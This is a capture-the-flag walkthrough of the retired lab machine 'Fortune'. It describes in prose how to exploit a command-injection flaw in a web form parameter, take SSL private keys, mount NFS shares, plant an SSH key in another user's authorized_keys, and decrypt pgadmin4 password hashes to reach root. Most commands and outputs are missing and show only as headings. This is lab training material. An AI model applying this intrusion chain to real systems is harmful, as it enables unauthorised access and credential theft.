Today, we’re going to solve another CTF machine “Fortune”. It is now retired box and can be accessible to VIP member.

Specifications

  • Target OS: FreeBSD
  • IP Address: 10.10.10.127
  • Difficulty: Insane

Contents

  • Getting user
  • Getting root

Enumeration

As always, the first step consists of reconnaissance phase as port scanning.

Ports Scanning

During this step we’re gonna identify the target to see what we have behind the IP Address.

Enumerating Port 80

The URL http://10.10.10.127 reveals nothing but a POST_Method form which takes input as radio buttons and submit them.

Exploitation

However, if you Intercept the request the parameter db reveals RCE vulnerability.

Burp Suite

Curl

After doing some enumerating we were able to retrieve SSL public and private key.

Public Certs

Private Key

Convert a PEM Certificate to PFX format Read More Here!

This will create cert.p12 file which we can import through firefox and load https://fortune.htb

After that click on the generate.

This will create public key and private key for you to ssh.

However, if you try to ssh to bob it won’t work.

The nfsuser hints towards NFS shares let’s check if there’s any other ports opened.

Mount

After mounting to access charlie directory you have to add another user.

Now, moving forward if we take a look at mbox this shows.

If we go to .ssh directory we have write permission to it let’s copy our public key which the website generated for us and echo “key” > auth…_key

Now,

Privilege Escalation

If we search for pgadmin4 we found these directories and files related to this.

We found these

If you take a look inside /usr/local/pgadmin4/pgadmin4-3.4/web/config_local.py.

There’s an SQL database Path.

/var/appsrv/pgadmin4/pgadmin4.db

Let’s download it into out machine.

There’s a pre-installed software in Kali DB Browser for SQLite

If we take a look at server table it includes some salted hashes.

We have to crack the Password. But let’s find out which hash is this.

The application is open sourced so if we take a look at github source code for cryptography we found this crypto.py.

There’s some functions which we have to take a look at and then decrypt the hash using hints from that crypto.py.

crypto.py

There’s one more thing which is bob hash the one we found in users table.

Output

Now, that we have a password we can su root since the mail we found suggested using similar password as dba database.